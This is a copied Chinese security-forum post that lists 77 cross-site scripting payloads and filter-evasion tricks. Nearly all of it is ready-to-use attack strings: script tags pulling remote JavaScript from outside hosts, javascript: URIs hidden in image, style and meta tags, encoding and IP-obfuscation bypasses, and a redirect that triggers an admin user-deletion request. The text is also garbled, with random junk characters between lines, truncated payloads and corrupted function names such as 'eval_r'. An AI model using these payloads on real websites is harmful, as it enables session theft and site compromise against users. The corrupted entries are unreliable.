貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。0 [3 R7 E8 t) i5 X4 o+ {
(1)普通的XSS JavaScript注入
8 D+ D" E& Z9 q! I* u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 b# S( D( H# o, u
(2)IMG标签XSS使用JavaScript命令
( E0 n+ |! G0 E! P3 |: B<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ O9 C/ o0 A7 ]& k3 \& N. |
(3)IMG标签无分号无引号; U0 c$ k2 s3 z3 g3 a
<IMG SRC=javascript:alert(‘XSS’)>8 X% G7 D0 m" K3 f
(4)IMG标签大小写不敏感% B+ O2 |! k3 [! V. G8 S
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, T. ], D, _/ D
(5)HTML编码(必须有分号)2 N: E, c- i3 f, n0 S% a
<IMG SRC=javascript:alert(“XSS”)>7 l& W/ k: x' R7 T u
(6)修正缺陷IMG标签
, S; y6 j/ P$ b" w/ M<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
0 h6 L4 P, F. J; ?# B6 D- X2 H4 z$ I5 r
- L1 H# F2 K1 _! v* k: I4 _; ?(7)formCharCode标签(计算器)) P# x/ r' }) x [+ U7 R, F
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# W7 j# @+ u+ `6 A(8)UTF-8的Unicode编码(计算器)
/ q5 o/ ~+ E/ H a2 i; I<IMG SRC=jav..省略..S')>
- f: u+ v# g" z( b(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; Q2 X+ L' U. r<IMG SRC=jav..省略..S')>- U% r( l" A' D% @( t3 I3 p
(10)十六进制编码也是没有分号(计算器)4 U4 `* b4 A6 L
<IMG SRC=java..省略..XSS')>- C9 c( Q* r4 P) V/ m5 |
(11)嵌入式标签,将Javascript分开
' v8 L$ V3 \2 i7 ?' q* l<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 q; W7 v, w. N: x" d1 w(12)嵌入式编码标签,将Javascript分开
0 z( M8 M1 {2 `% T6 C$ B3 M<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ @0 X' N! K- v8 Y2 n(13)嵌入式换行符- H6 i) R' u( B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( {, L3 e- _( y+ W( R2 Z8 m(14)嵌入式回车
8 X8 w% d z3 ]- Q/ I<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 K2 Y7 a. _4 ?(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) R: |2 V5 N. @% P4 T2 e" I<IMG SRC=”javascript:alert(‘XSS‘)”>
5 `. I7 k! F5 }9 T( t" _$ e: C(16)解决限制字符(要求同页面)4 H0 _- r3 }: m3 i8 T4 F/ ~- I& g( [
<script>z=’document.’</script>
1 U3 Z+ J+ z5 U- u<script>z=z+’write(“‘</script>7 Z8 \/ _, S S! E7 `5 O
<script>z=z+’<script’</script>
0 u' c: Z& B7 W$ H& x( \<script>z=z+’ src=ht’</script>
. ~8 [5 p: n( `! f" n1 c<script>z=z+’tp://ww’</script>
+ N4 Q0 X' n' F" E4 J& Q/ i<script>z=z+’w.shell’</script>
6 N: n3 X/ X* k4 K. g6 j- r A<script>z=z+’.net/1.’</script>4 r/ y6 s3 M+ f* R9 U; I* x
<script>z=z+’js></sc’</script>
; C1 X/ Z; z7 T9 M; K% @4 x# r<script>z=z+’ript>”)’</script>8 T4 \. }7 H5 H, O# y# h& I' y; Y
<script>eval_r(z)</script>& Z' W5 N0 Q- F( D
(17)空字符12-7-1 T00LS - Powered by Discuz! Board; j' v! t0 O0 W( E5 |
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
! R( i0 @8 }* T: Dperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 f0 Q$ j4 Y n: C* l(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 J0 D9 x, C7 ^2 B3 n+ E
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 ?+ C' Q6 ]8 y# }% f( Y(19)Spaces和meta前的IMG标签
& I/ z8 Q, }$ g. ?% x6 A8 ^0 Z<IMG SRC=” javascript:alert(‘XSS’);”>
7 _0 V! C9 }9 h2 T6 i- K1 w; x(20)Non-alpha-non-digit XSS: I: c4 c/ t# S& T6 I: L! ~+ S" m; }
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" b2 ]' p. H& w$ T& Z* ~(21)Non-alpha-non-digit XSS to 2
$ e: x; [4 b2 ? a& r+ U- C8 Z0 r; d<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: F* }9 K3 @! q: E; \! C- W(22)Non-alpha-non-digit XSS to 3' |: |5 a9 z/ d/ N
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 x% ~8 i1 m7 s. B6 {" P; g* G(23)双开括号1 |; Q# }4 b$ d1 Y! Z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>5 r8 _' W7 O' @! x+ |, _$ z
(24)无结束脚本标记(仅火狐等浏览器)- g$ z6 d, E5 s
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 I( ]# e' n8 b
(25)无结束脚本标记2
4 u3 P; y6 m: f5 z0 {& K8 o<SCRIPT SRC=//3w.org/XSS/xss.js>
& @: M4 S; H( B- g! s; w3 o(26)半开的HTML/JavaScript XSS
' g/ e4 L% \6 O4 T- ?<IMG SRC=”javascript:alert(‘XSS’)”
1 E. T/ ?: t! k8 }- }! g4 f(27)双开角括号
* w ^; L8 P2 t: \" h+ _, E<iframe src=http://3w.org/XSS.html <
8 x! k. C4 Z/ l j. _/ n(28)无单引号 双引号 分号
0 g' j/ A3 ?' _* y% f& b<SCRIPT>a=/XSS/
8 y& v0 k! v8 M0 a$ |, r$ Valert(a.source)</SCRIPT>
' q! j2 g+ \3 C. S I(29)换码过滤的JavaScript/ L$ g* {0 c; V. Q* c- B
\”;alert(‘XSS’);//& U6 c6 K6 g* o* E
(30)结束Title标签
2 L8 H5 `9 g: s' w6 ?$ @</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>- L( v/ w$ g* u# T/ R3 ]: ~
(31)Input Image
0 P6 s* W" e7 T<INPUT SRC=”javascript:alert(‘XSS’);”>1 M: I ~: d+ t* T- ~
(32)BODY Image
& n1 d$ J* r3 `1 e8 T<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. U4 U( x) m7 q! n2 P( n
(33)BODY标签0 T+ j# x4 Z4 G& c, @% N6 ^
<BODY(‘XSS’)>% O! Q) s% H3 w* Z( z$ `
(34)IMG Dynsrc$ F1 K, f, I1 s6 v7 w( {
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 v/ Q. |8 m/ n( P& {/ b& m0 r(35)IMG Lowsrc
3 x; M3 V* N' F# M& H9 k1 P<IMG LOWSRC=”javascript:alert(‘XSS’)”>" f1 t9 k2 a( L( M
(36)BGSOUND
) c6 m, R$ p% M" m( i. l<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 J o2 ?) {' y7 M0 v(37)STYLE sheet
2 ]( V) D4 n8 [* \$ X1 n<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) {; ?: O& d$ f, ]5 k+ @/ b
(38)远程样式表
4 y% o& K; v- Y3 x' D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
& S& W- u: s; h m; r I) n% w(39)List-style-image(列表式)
) V" p5 M% c$ @$ \, A: C, Y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
4 C8 s$ b+ E6 p5 p3 X" D' G(40)IMG VBscript8 x" B. X6 R% B' q& a7 s
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS6 Q; s+ X5 L, R1 }( n
(41)META链接url
& u$ z# M5 y0 ~& N( c; j) Z/ o5 T- M, p; W+ Q
$ }+ @- M0 g/ q
<META HTTP-EQUIV=”refresh” CONTENT=”0;4 O' ^3 \1 w! m) I/ h: Y
URL=http://;URL=javascript:alert(‘XSS’);”>; U* f% \: |" d, ?. t% P
(42)Iframe
/ F$ f' q. @6 S3 P1 Q7 c<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>- A$ h6 h* k! H& ~# o; n: N2 \
(43)Frame; ]. z* S% U" m9 J% N5 A
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board5 p# w1 Q. v9 t$ V4 Q7 y
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
$ r/ F) F) T8 [/ t( _(44)Table
, Q# V# @) {8 U8 l1 P: f<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> d2 M6 G5 d: ^' ^2 Z
(45)TD0 k! e4 X8 ^) q8 e
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, o8 w6 M e% I& z$ q% I$ J: L2 L(46)DIV background-image/ k! a* r) _/ G: b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 _4 Y. e g) R& p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8 T( O5 [; j+ ~4 C) L6 o8&13&12288&65279)/ S8 z1 p3 L1 D$ }5 ^/ x8 L e
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; z: r; K5 X: b' G7 ]
(48)DIV expression
: b& d: O- R" N. v6 ]; m" J5 W<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& A, u+ g3 ?- l: d7 F$ r
(49)STYLE属性分拆表达$ [+ s3 r, |$ \. c5 w9 w9 o
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 U5 `: W. v9 T' g/ ^& r
(50)匿名STYLE(组成:开角号和一个字母开头)! i |) \5 k( s; f1 j8 m9 I% H8 K
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* Q' J3 x* ^5 ?* r* u! |4 n" g+ X3 \(51)STYLE background-image
( M1 I+ {3 F$ F1 f7 z& w8 d/ y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
% Y+ i% @4 V3 dCLASS=XSS></A>- {% ]; V, O* U2 M- O
(52)IMG STYLE方式
* b" i- |! A# S+ t1 eexppression(alert(“XSS”))’>
2 W' Z: | a+ `$ \/ e; E(53)STYLE background
* L! h# {# H) p<STYLE><STYLE3 O* @$ ]+ w1 b6 W9 s% D. l C, `
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>( Q. E" O# X/ d
(54)BASE
0 ]7 S7 J* y# R<BASE HREF=”javascript:alert(‘XSS’);//”>- H; P! P- F% e b! j; {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS6 P5 t% N) A% A9 B' A/ q9 Y& n
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>% |" g( k' H/ z/ B% m" {
(56)在flash中使用ActionScrpt可以混进你XSS的代码
U2 O) @/ n) w8 Ma=”get”;) p9 e: X1 Z* f% y2 ~* N8 y& N, n
b=”URL(\”";" k2 M/ P9 j- D6 X2 l) Q
c=”javascript:”;: v6 B' i2 r, B" y
d=”alert(‘XSS’);\”)”;9 J" f) c, A7 W- z
eval_r(a+b+c+d);3 @% D( \$ ^3 i# ]
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- s, G5 b; W1 T5 l
<HTML xmlns:xss>
7 [" n' E6 j! @8 }0 u8 Z5 p<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. |4 G1 L- {+ \# Y+ L<xss:xss>XSS</xss:xss>
% h0 a+ d8 w( h2 ^) D1 Y</HTML>
) A! i* a6 A3 J6 T* o(58)如果过滤了你的JS你可以在图片里添加JS代码来利用' E4 W& ^4 y- K0 o% d7 j3 V7 l- d3 Y
<SCRIPT SRC=””></SCRIPT>
: L4 E( A) J9 v! M# |( _(59)IMG嵌入式命令,可执行任意命令
& e0 o8 q& B, E, K<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 G' I- D- _2 X1 c; \/ V( P- M( w4 P
(60)IMG嵌入式命令(a.jpg在同服务器)8 l+ S8 T0 U% h0 h+ z5 [' P
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 D6 {( G s; O% {4 x8 p/ U(61)绕符号过滤. F, w+ ~$ c% v, l } ?6 Y* q
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) t$ H6 V& k( }
(62)+ H* F, L( b! M. m
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 J5 M' V" u" M) N$ s' ]$ ?(63)* }" w0 ]2 C$ u9 g" r
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 j5 }) t. p4 _+ { X4 Z: |
(64)
5 i2 w2 e7 o9 j0 u<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>& P0 |: ]/ N# f" A5 S. _
(65)
0 H Y( R1 `8 t<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
& n' T' G7 h( X+ b$ K(66)12-7-1 T00LS - Powered by Discuz! Board
- m; I) l$ ^! d; W9 o/ R7 ^https://www.t00ls.net/viewthread ... table&tid=15267 4/6; {/ b- A, G+ b. Z, u
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' ]4 p) [7 t% ~/ N; L
(67)" W" r5 C0 A6 n1 m0 r
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>" n: z/ E( t) F, F
</SCRIPT>
1 [+ |, `, `& ?4 p/ m/ f3 h(68)URL绕行/ x6 u7 a/ `% A5 P% ~; ~( x5 D
<A HREF=”http://127.0.0.1/”>XSS</A>3 i& _6 p0 p, d' c) d, m2 l
(69)URL编码 S( I1 H5 }& R/ ~7 {6 C
<A HREF=”http://3w.org”>XSS</A>
- V' K! f" i! l/ z; S5 }$ i0 k(70)IP十进制( h9 Y! Q* k* g! m% P
<A HREF=”http://3232235521″>XSS</A>
( U9 d8 F4 n, ? n$ g+ s" y& Q(71)IP十六进制
( X! V T- X: e% k }' U<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
K$ Y: x' ^0 x(72)IP八进制/ X0 t0 {' D# O3 w+ ^0 V+ k
<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ J# x/ n: f3 e, I* J/ |
(73)混合编码( \; c( O! @/ S' }- s* x* J
<A HREF=”h
7 }5 b& s* i3 k' K& Z4 I' V9 ~tt p://6 6.000146.0×7.147/”">XSS</A>
/ v5 C5 Q+ `- U2 {2 C9 s: r(74)节省[http:]; S$ X5 {8 g9 }$ {
<A HREF=”//www.google.com/”>XSS</A>
& [. q/ G; `7 O O7 C0 g(75)节省[www]
$ a' I) J" S; S1 m<A HREF=”http://google.com/”>XSS</A>
! T" ^* |7 o6 ?: j( A( K% t( I- m(76)绝对点绝对DNS
% ]6 e- [" @7 ^<A HREF=”http://www.google.com./”>XSS</A>. U2 [$ g2 ]; \
(77)javascript链接
, k) `# ?8 C- m7 a! ^<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>( k( y- C g2 U/ g. U
/ g, |8 j" r# M! r) s原文地址:http://fuzzexp.org/u/0day/?p=14
4 S1 Y: m" h5 L# S; W0 c6 ?: e) t6 x8 [7 W2 E% s R
|